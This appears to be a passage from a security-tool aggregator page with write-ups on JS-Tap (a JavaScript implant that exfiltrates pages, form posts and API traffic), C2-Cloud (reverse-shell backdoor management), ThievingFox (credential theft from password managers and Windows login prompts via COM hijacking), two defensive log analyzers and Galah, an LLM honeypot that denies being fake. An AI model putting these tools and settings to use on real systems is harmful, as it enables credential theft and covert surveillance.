window.taperTag = 'whatever';

Custom Payload Tasks

Used to set whether clients are checking for Custom Payload tasks, and how often they're checking. The jitter settings let you optionally set a floor and ceiling modifier. A random value between these two numbers will be picked and added to the check delay. Set these to 0 and 0 for no jitter.

window.taperTaskCheck        = true;
window.taperTaskCheckDelay = 5000;
window.taperTaskJitterBottom = -2000;
window.taperTaskJitterTop = 2000;
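
To make the jitter arithmetic concrete, the effective check delay can be expressed as a small Python sketch (the payload itself is JavaScript; this is only illustrative):

import random

taskCheckDelay = 5000   # base check delay in ms (window.taperTaskCheckDelay)
jitterBottom   = -2000  # floor modifier (window.taperTaskJitterBottom)
jitterTop      = 2000   # ceiling modifier (window.taperTaskJitterTop)

# A random value between the two modifiers is added to the base delay, so with
# these values each task check happens roughly 3000-7000 ms after the previous one.
effective_delay = taskCheckDelay + random.uniform(jitterBottom, jitterTop)
print(effective_delay)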

Exfiltrate HTML

true/false setting on whether a copy of the HTML code of each page viewed is exfiltrated.

window.taperexfilHTML = true;

Copy Form Submissions

true/false setting on whether to intercept a copy of all form posts.

window.taperexfilFormSubmissions = true;

MonkeyPatch APIs

Enable monkeypatching of the XHR and Fetch APIs. This works in trap mode. In implant mode, only the Fetch API is monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime. Enabling this feature will re-write the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Note that jQuery based network calls will be captured via the XHR API, which jQuery uses under the hood for network calls.

window.monkeyPatchAPIs = true;

Screenshot after API calls

By default JS-Tap will capture a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can be configured to capture a new screenshot after an XHR or Fetch API call is made. These API calls are often used to retrieve new data to display. Two settings are offered, one to enable the "after API call screenshot", and a delay in milliseconds. X milliseconds after the API call JS-Tap will capture the new screenshot.

window.postApiCallScreenshot = true;
window.screenshotDelay = 1000;

JS-Tap Portal

Login with the admin credentials provided by the server script on startup.

Clients show up on the left, selecting one will show a time series of their events (loot) on the right.

The clients list can be sorted by time (first seen, last update received) and the list can be filtered to only show the "starred" clients. There is also a quick filter search above the clients list that allows you to quickly filter clients that have the entered string. Useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname.

Each client has an 'x' button (near the star button). This allows you to delete the session for that client; if they're sending junk or useless data, you can prevent that client from submitting future data.

When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issued, select Session Settings at the top and you can disable new client sessions. You can also block specific IP addresses from receiving a session in here.

Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc) you can add it to the client notes. After you've reviewed all your clients and made your notes, the View All Notes feature at the top allows you to export all notes from all clients at once.

The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does). If you want to load the latest events for the client you need to select the client again on the left.

Custom Payloads

Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded.

[{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}]

The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients.

In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting.

You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate that a client checks for custom payload tasks is variable, and that rate can be changed in the main JS-Tap payload configuration. That rate can be changed with a custom payload (calling the updateTaskCheckInterval(newDelay) function). The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function.

The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles.

To run a payload on a single client, use the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients.

Tools

A few tools are included in the tools subdirectory.

clientSimulator.py

A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine.

At the top of the script is a numClients variable, set to how many clients you want to simulate. The script will spawn a thread for each, retrieve a client session, and send data in, simulating a client.

numClients = 50

You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to:

apiServer = "https://127.0.0.1:8444"

JS-Tap run using gunicorn scales quite well.

MonkeyPatchApp

A simple app used for testing XHR/Fetch monkeypatching; it also gives you a basic app to test the payload against in general.

Run with:

python3 monkeyPatchLab.py

By default this will start the application running on:

https://127.0.0.1:8443

Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file; this is set in the injectPayload() function in main.js:

function injectPayload()
{
document.head.appendChild(Object.assign(document.createElement('script'),
{src:'https://127.0.0.1:8444/lib/telemlib.js',type:'text/javascript'}));
}

formParser.py

An abandoned tool, but a good start on analyzing HTML for forms and parsing out their parameters. Intended to help automatically generate JavaScript payloads to target form posts.

You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware.

generateIntelReport.py

No longer working; it was used before the web UI for JS-Tap existed. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons; most of it is stored in the database, with the exception of exfiltrated HTML code and screenshots.

Contact

@hoodoer
[email protected]



MasterParser - Powerful DFIR Tool Designed For Analyzing And Parsing Linux Logs


What is MasterParser ?

MasterParser stands as a robust Digital Forensics and Incident Response tool meticulously crafted for the analysis of Linux logs within the /var/log directory. Specifically designed to expedite the investigative process for security incidents on Linux systems, MasterParser adeptly scans supported logs, such as auth.log for example, extracting critical details including SSH logins, user creations, event names, IP addresses and much more. The tool's generated summary presents this information in a clear and concise format, enhancing efficiency and accessibility for Incident Responders. Beyond its immediate utility for DFIR teams, MasterParser proves invaluable to the broader InfoSec and IT community, contributing significantly to the swift and comprehensive assessment of security events on Linux platforms.
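
As an illustration of the kind of detail pulled from auth.log (MasterParser itself is a PowerShell script; this Python sketch is not its actual code), successful SSH logins and their source IPs can be extracted with a regular expression:

import re

# Match lines like: "Accepted password for alice from 10.0.0.5 port 50022 ssh2"
ssh_login = re.compile(r"Accepted (?:password|publickey) for (?P<user>\S+) from (?P<ip>\S+)")

with open("auth.log") as log:
    for line in log:
        match = ssh_login.search(line)
        if match:
            print(match.group("user"), match.group("ip"))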


MasterParser Wallpapers

Love MasterParser as much as we do? Dive into the fun and jazz up your screen with our exclusive MasterParser wallpaper! Click the link below and get ready to add a splash of excitement to your device! Download Wallpaper

Supported Logs Format

This is the list of supported log formats within the /var/log directory that MasterParser can analyze. In future updates, MasterParser will support additional log formats for analysis.

Supported Log Formats List
auth.log

Feature & Log Format Requests:

If you wish to propose the addition of a new feature / log format, kindly submit your request by creating an issue: Click here to create a request

How To Use ?

How To Use - Text Guide

  1. From this GitHub repository press on "<> Code" and then press on "Download ZIP".
  2. From "MasterParser-main.zip" extract the folder "MasterParser-main" to your Desktop.
  3. Open a PowerShell terminal and navigate to the "MasterParser-main" folder.
# How to navigate to "MasterParser-main" folder from the PS terminal
PS C:\> cd "C:\Users\user\Desktop\MasterParser-main\"
  4. Now you can execute the tool; for example, to see the tool command menu, do this:
# How to show MasterParser menu
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Menu
  5. To run the tool, put all your /var/log/* logs into the 01-Logs folder, and execute the tool like this:
# How to run MasterParser
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Start
  6. That's it, enjoy the tool!

How To Use - Video Guide

https://github.com/YosfanEilay/MasterParser/assets/132997318/d26b4b3f-7816-42c3-be7f-7ee3946a2c70

MasterParser Social Media Publications

Social Media Posts
1. First Tool Post
2. First Tool Story Publication By Help Net Security
3. Second Tool Story Publication By Forensic Focus
4. MasterParser featured in Help Net Security: 20 Essential Open-Source Cybersecurity Tools That Save You Time


C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers


The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

Reverse shells support:

  1. Reverse TCP
  2. Reverse HTTP
  3. Reverse HTTPS (configure it behind an LB)
  4. Telegram C2

Demo

C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk

Key Features

πŸ”’ Anywhere Access: Reach the C2 Cloud from any location.
πŸ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
πŸ–±οΈ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
πŸ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

Tech Stack

πŸ› οΈ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
πŸ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
🌐 Nginx: Effortlessly routing traffic between web and backend systems.
πŸ“¨ Redis PubSub: Serving as a robust message broker for seamless communication.
πŸš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
πŸ’Ύ Postgres DB: Ensuring persistent storage for seamless continuity.

Architecture

Application setup

  • Management port: 9000
  • Reverse HTTP port: 8000
  • Reverse TCP port: 8888

  • Clone the repo

  • Optional: Update chat_id, bot_token in c2-telegram/config.yml
  • Execute docker-compose up -d to start the containers. Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try again after some time.

Credits

Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

License

Distributed under the MIT License. See LICENSE for more information.

Contact



OSTE-Web-Log-Analyzer - Automate The Process Of Analyzing Web Server Logs With The Python Web Log Analyzer


Automate the process of analyzing web server logs with the Python Web Log Analyzer. This powerful tool is designed to enhance security by identifying and detecting various types of cyber attacks within your server logs. Stay ahead of potential threats with features that include:


Features

  1. Attack Detection: Identify and flag potential Cross-Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and other common web application attacks (see the sketch after this list).

  2. Rate Limit Monitoring: Detect suspicious patterns in multiple requests made in a short time frame, helping to identify brute-force attacks or automated scanning tools.

  3. Automated Scanner Detection: Keep your web applications secure by identifying requests associated with known automated scanning tools or vulnerability scanners.

  4. User-Agent Analysis: Analyze and identify potentially malicious User-Agent strings, allowing you to spot unusual or suspicious behavior.
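
The attack detection above boils down to pattern matching on log entries; as a rough illustration (a sketch with simplified, hypothetical indicators, not the tool's actual rule set):

import re

# Hypothetical, simplified indicators; the tool's real rules are more extensive.
PATTERNS = {
    "XSS": re.compile(r"<script|%3Cscript", re.IGNORECASE),
    "LFI": re.compile(r"\.\./|/etc/passwd", re.IGNORECASE),
}

with open("access.log") as log:  # assumed access log path
    for line in log:
        hits = [name for name, rx in PATTERNS.items() if rx.search(line)]
        if hits:
            print(",".join(hits), line.strip())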

Future Features

This project is actively developed, and future features may include:

  1. IP Geolocation: Identify the geographic location of IP addresses in the logs.
  2. Real-time Monitoring: Implement real-time monitoring capabilities for immediate threat detection.

Installation

The tool only requires Python 3 at the moment.

  1. git clone https://github.com/OSTEsayed/OSTE-Web-Log-Analyzer.git
  2. cd OSTE-Web-Log-Analyzer
  3. python3 WLA-cli.py

Usage

After cloning the repository to your local machine, you can initiate the application by executing the command python3 WLA-cli.py. A simple usage example: python3 WLA-cli.py -l LogSampls/access.log -t

Use -h or --help for more detailed usage examples: python3 WLA-cli.py -h

Contact

LinkedIn: https://www.linkedin.com/in/oudjani-seyyid-taqy-eddine-b964a5228



ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

By: Zion3R
30 April 2024 at 12:30


ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and Windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internal functions to gather credentials.

The accompanying blog post can be found here


Installation

Linux

Rustup must be installed; follow the instructions available here: https://rustup.rs/

The mingw-w64 package must be installed. On Debian, this can be done using:

apt install mingw-w64

Both x86 and x86_64 windows targets must be installed for Rust:

rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu

Mono and Nuget must also be installed; instructions are available here: https://www.mono-project.com/download/stable/#download-lin

After adding the Mono repositories, Nuget can be installed using apt:

apt install nuget

Finally, Python dependencies must be installed:

pip install -r client/requirements.txt

ThievingFox works with python >= 3.11.

Windows

Rustup must be installed; follow the instructions available here: https://rustup.rs/

Both x86 and x86_64 windows targets must be installed for Rust:

rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc

.NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

Finally, Python dependencies must be installed:

pip install -r client/requirements.txt

ThievingFox works with python >= 3.11

NOTE: On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developer PowerShell (Tools > Command Line > Developer PowerShell)

Targets

All modules have been tested on the following Windows versions:

Windows Version
Windows Server 2022
Windows Server 2019
Windows Server 2016
Windows Server 2012R2
Windows 10
Windows 11

[!CAUTION] Modules have not been tested on other versions, and are expected not to work.

Application Injection Method
KeePass.exe AppDomainManager Injection
KeePassXC.exe DLL Proxying
LogonUI.exe (Windows Login Screen) COM Hijacking
consent.exe (Windows UAC Popup) COM Hijacking
mstsc.exe (Windows default RDP client) COM Hijacking
RDCMan.exe (Sysinternals' RDP client) COM Hijacking
MobaXTerm.exe (3rd party RDP client) COM Hijacking

Usage

[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

ThievingFox contains 3 main modules: poison, cleanup and collect.

Poison

For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that matches the properties of the original DLL, uploads it to the server, and modifies the registry if needed to perform COM hijacking.

To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

--mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only currently logged-in users are impacted (all users that have an HKCU hive).

--keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

The KeePass module requires the Visual C++ Redistributable to be installed on the target.

Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

[!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
--mobaxterm-poison-hkcr
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications

Cleanup

For each application specified in the command line parameters, the cleanup module first removes poisoning artifacts that force the target application to load the hooking library. Then, it tries to delete the libraries that were uploaded to the remote host.

For applications that support poisoning of both the HKCU and HKCR hives, both are cleaned up regardless.

Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

It does not clean extracted credentials on the remote host.

[!IMPORTANT] If the targeted application is in use while the cleanup module is run, the DLLs that were dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications

Collect

For each application specified on the command line parameters, the collect module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/.

Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications


Galah - An LLM-powered Web Honeypot Using The OpenAI API

By: Zion3R
29 April 2024 at 12:30


TL;DR: Galah (/Ι‘Ι™Λˆlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


Description

Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

Future Enhancements

  • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

  • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

  • Support for Other LLMs.

Getting Started

  • Ensure you have Go version 1.20+ installed.
  • Create an OpenAI API key from here.
  • If you want to serve over HTTPS, generate TLS certificates.
  • Clone the repo and install the dependencies.
  • Update the config.yaml file.
  • Build and run the Go binary!
% git clone [email protected]:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
β–ˆβ–ˆ β–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi

2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.

Example Responses

Here are some example responses:

Example 1

% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

JSON log record:

{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

Example 2

% curl http://localhost:8080/.aws/credentials
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2

JSON log record:

{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

Okay, that was impressive!

Example 3

Now, let's do some sort of adversarial testing!

% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.

JSON log record:

{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

πŸ˜‘

% curl http://localhost:8888/i-mean-are-you-a-fake-server
No, I am not a fake server.

JSON log record:

